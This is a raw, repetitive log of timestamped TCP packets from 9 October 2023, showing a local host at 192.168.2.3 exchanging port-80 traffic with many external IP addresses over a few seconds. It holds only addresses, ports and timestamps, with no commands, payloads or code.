                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.686367989 CEST4972280192.168.2.334.149.87.45
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.686461926 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.686547995 CEST4972180192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.686813116 CEST4972180192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.716289043 CEST8049723104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.716409922 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.716711998 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.731295109 CEST4971580192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.817085981 CEST4972480192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819497108 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819510937 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819550991 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819552898 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819570065 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819572926 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819586992 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819602966 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819690943 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819701910 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819713116 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819721937 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819725037 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819739103 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.819781065 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.840528011 CEST804972054.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.840539932 CEST804972054.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.840584993 CEST4972080192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.840621948 CEST4972080192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.850878000 CEST4972080192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.856451035 CEST804972234.149.87.45192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.879426956 CEST8049723104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890074968 CEST8049723104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890136957 CEST8049723104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890140057 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890170097 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890171051 CEST8049723104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890201092 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890320063 CEST8049723104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890347958 CEST8049723104.26.6.221192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890350103 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.890382051 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.902343035 CEST804972234.149.87.45192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.902540922 CEST4972280192.168.2.334.149.87.45
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.972610950 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973589897 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973602057 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973637104 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973664999 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973673105 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973767042 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973779917 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973792076 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973809004 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973820925 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973840952 CEST4972180192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973892927 CEST4972180192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973918915 CEST804971880.93.82.33192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.973978996 CEST4971880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.988746881 CEST8049724142.250.189.19192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.988840103 CEST4972480192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.039972067 CEST4972480192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.081417084 CEST804972054.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.136982918 CEST4972580192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.210534096 CEST8049724142.250.189.19192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.249166965 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.260137081 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.260221958 CEST804972159.106.19.204192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.260246038 CEST4972180192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.260302067 CEST4972180192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.267966986 CEST8049724142.250.189.19192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.268032074 CEST4972480192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.300092936 CEST8049725104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.300180912 CEST4972580192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.322046995 CEST4972580192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.322570086 CEST4972780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.412055016 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.412159920 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.412431002 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.484771013 CEST8049725104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.525785923 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.553108931 CEST80497273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.553205013 CEST4972780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.553530931 CEST4972780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.575161934 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.650404930 CEST4972980192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.699845076 CEST4973080192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.783356905 CEST80497273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.783382893 CEST80497273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.783488035 CEST4972780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.783528090 CEST4972780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.784302950 CEST4972780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.798808098 CEST4973180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.842046022 CEST80497283.64.163.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.842114925 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.842351913 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.861615896 CEST4973280192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.013591051 CEST80497273.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.029231071 CEST80497313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.029400110 CEST4973180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.029656887 CEST4973180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.031460047 CEST804973062.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.031539917 CEST4973080192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.031687021 CEST4973080192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.104352951 CEST4973380192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.140255928 CEST804973234.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.140376091 CEST4973280192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.140633106 CEST4973280192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.158008099 CEST80497283.64.163.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.158157110 CEST80497283.64.163.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.158214092 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.159782887 CEST8049725104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.159823895 CEST8049725104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.159845114 CEST4972580192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.159857035 CEST8049725104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.159863949 CEST4972580192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.159895897 CEST4972580192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.261584044 CEST80497313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.261610031 CEST80497313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.261686087 CEST4973180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.261687040 CEST4973180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.262341976 CEST4973180192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.363419056 CEST804973062.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.364622116 CEST804973062.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.364736080 CEST4973080192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.381197929 CEST4973080192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.395492077 CEST804973234.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.395541906 CEST804973234.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.395580053 CEST804973234.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.395596027 CEST4973280192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.395620108 CEST4973280192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.395755053 CEST804973234.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.395801067 CEST4973280192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.402388096 CEST4973280192.168.2.334.94.160.21
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.437406063 CEST4973480192.168.2.3192.124.249.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.446454048 CEST804973389.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.446528912 CEST4973380192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.446989059 CEST4973380192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.492064953 CEST80497313.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.612267971 CEST8049734192.124.249.10192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.612396955 CEST4973480192.168.2.3192.124.249.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.612801075 CEST4973480192.168.2.3192.124.249.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.653173923 CEST4972980192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.698271990 CEST804973234.94.160.21192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.714190960 CEST804973062.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.714379072 CEST4973080192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.731250048 CEST4971580192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.787493944 CEST8049734192.124.249.10192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.787759066 CEST8049734192.124.249.10192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.787823915 CEST4973480192.168.2.3192.124.249.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.788873911 CEST804973389.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.800061941 CEST804973389.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.800086975 CEST804973389.161.163.246192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.800151110 CEST4973380192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.800172091 CEST4973380192.168.2.389.161.163.246
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.819586039 CEST4973480192.168.2.3192.124.249.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.994946003 CEST8049734192.124.249.10192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.995277882 CEST4973480192.168.2.3192.124.249.10
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.066159964 CEST4973580192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.344969988 CEST4973680192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.398089886 CEST8049735185.80.51.179192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.398281097 CEST4973580192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.398578882 CEST4973580192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559077978 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559138060 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559174061 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559211016 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559212923 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559247017 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559251070 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559251070 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559259892 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559284925 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559302092 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559329987 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559401035 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559446096 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559503078 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559547901 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559632063 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559675932 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559778929 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559815884 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559822083 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559863091 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559883118 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559930086 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.559963942 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560031891 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560054064 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560074091 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560229063 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560282946 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560287952 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560329914 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560853958 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560890913 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560947895 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560970068 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.560993910 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.561039925 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.561089993 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562201023 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562314987 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562323093 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562361002 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562393904 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562410116 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562437057 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.562450886 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.563335896 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.563453913 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.563679934 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.563779116 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.563838959 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.563934088 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564155102 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564201117 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564212084 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564248085 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564254999 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564268112 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564306021 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564322948 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564336061 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564346075 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564364910 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564378023 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564400911 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564402103 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564414978 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564438105 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.564466953 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565196037 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565208912 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565291882 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565305948 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565306902 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565344095 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565454006 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.565493107 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566097975 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566186905 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566190004 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566200972 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566214085 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566226959 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566226959 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.566252947 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567013979 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567050934 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567107916 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567109108 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567116976 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567123890 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567143917 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.567151070 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.568022966 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.568034887 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.568046093 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.568056107 CEST8049726104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.568113089 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.568141937 CEST4972680192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.620326996 CEST804973660.43.154.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.620488882 CEST4973680192.168.2.360.43.154.138
